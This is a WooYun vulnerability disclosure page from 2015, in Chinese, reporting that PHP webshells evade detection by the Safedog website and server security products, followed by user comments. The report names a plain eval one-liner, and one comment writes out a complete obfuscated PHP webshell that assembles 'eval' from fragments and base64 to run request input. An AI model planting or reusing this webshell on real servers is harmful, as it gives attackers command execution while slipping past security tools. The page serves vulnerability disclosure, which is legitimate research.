漏洞概要
关注数(24)
关注此漏洞
漏洞标题:安全狗(网站安全狗|服务器安全狗)最新版绕过webshell检测
提交时间:2015-03-26 14:31
修复时间:2015-06-29 14:32
公开时间:2015-06-29 14:32
漏洞类型:非授权访问/认证绕过
危害等级:中
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开
简要描述:
webshell检测绕过
详细说明:
1.一句话木马,单纯用<?php eval($_POST[1])?>这种方式肯定会被检测到,我们采用这种方式:
结果发现未被检测到
2.大马,两种:一个是DarkShell.php,另外一个是采用base64+gzinflate压缩编码,大马文件如下:
解密脚本网上看到一个,但是感觉不给力,自己改了下:
解密后的大马文件:
漏洞证明:
利用大马可以执行命令,上传文件:
如果权限够高(Administrator以上)还能kill掉网站安全狗和服务器安全狗,命令如下:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-06-29 14:32
厂商回复:
漏洞Rank:9 (WooYun评价)
最新状态:
2015-03-31:特征已经更新
漏洞评价:
评论
-
2015-03-26 15:06 |
子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
-
2015-03-26 15:09 |
f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)
-
2015-03-26 15:49 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
-
2015-03-26 15:49 |
千江雪 ( 路人 | Rank:0 漏洞数:1 | 闲着没事,研究研究)
-
2015-03-26 16:20 |
black4yl ( 路人 | Rank:2 漏洞数:1 | WoHoo !)
-
2015-03-26 16:26 |
ssss ( 实习白帽子 | Rank:80 漏洞数:19 | 虫子是给早起的勤奋的鸟儿七的。)
-
2015-03-26 16:28 |
a6c ( 路人 | Rank:10 漏洞数:4 | ·̮̃·̃)
-
2015-03-26 16:56 |
哈兹本德 ( 路人 | Rank:24 漏洞数:2 | 哎呀,菜鸟一枚。)
-
2015-03-27 19:55 |
zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)
-
2015-03-31 15:29 |
子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
-
2015-04-18 06:48 |
炊烟 ( 普通白帽子 | Rank:238 漏洞数:44 | 每一天都需要努力。)
-
2015-06-29 14:36 |
好基友一辈子 ( 普通白帽子 | Rank:138 漏洞数:37 )
赚钱真容易,明明是公开的方法洞主拿来小赚一笔,真好
-
2015-06-29 14:45 |
phith0n ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)
这一句话能执行?这也能过,还能补rank……醉了<?php $jm='MQ==';$s=base64_decode($jm);$a="e"./*-/*-*/"v"./*-/*-*/"a"./*-/*-*/"l";$b=base64_encode($a); $c=base64_decode($b);$c($_REQUEST[$s]);?>
-
2015-06-29 15:18 |
HackBraid ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)
@phith0n 一句话是不被检测到,大马是执行,呵呵
-
2015-06-29 20:44 |
Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)
喂喂喂。 洞主 你不能这样 缺wb 我们一人给你一个。